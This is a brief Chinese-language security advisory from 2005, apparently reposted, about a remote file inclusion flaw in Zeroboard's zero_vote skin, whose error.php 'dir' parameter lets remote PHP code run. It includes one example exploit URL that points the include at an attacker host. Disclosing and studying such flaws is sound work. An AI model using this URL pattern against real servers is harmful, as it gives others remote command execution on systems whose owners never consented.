安全公告:1012812
资料来源:http://securitytracker.com/id?1012812
CVE 参考:GENERIC-MAP-NOMATCH
发布日期:2005-1-9
发布作者:"Optik4Lab" <optik4lab@gmail.com>
漏洞影响:执行任意代码 用户进入系统
影响系统:Linux (Any), UNIX (Any), Windows (Any)
漏洞利用程序包含:是
厂商站点:http://www.nzeo.com/?channel=zeroboard
漏洞起因:Access控制错误 输入合法性错误
漏洞描述:Optik4Lab发现在Zeroboard的'zero_vote'中存在输入合法性漏洞,导致远程用户可以在目标系统上执行任意命令。
在'dir'参数中的'error.php'脚本对用户的输入验证不严。远程用户可以精心构造一个URL导致任意PHP代码从远程位置到被目标系统包含
并执行。
PHP代码包括操作系统命令都是以目标网站服务的权限运行。
示例: http://[target]/zeroboard/skin/zero_vote/error.php?dir=http://[attacker]
原始资料:http://www.optik4lab.com/modules/news/article.php?storyid=13
解决方法:目前厂商还没有提供补丁或者升级程序 【转自世纪安全网 http://www.21safe.com】
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)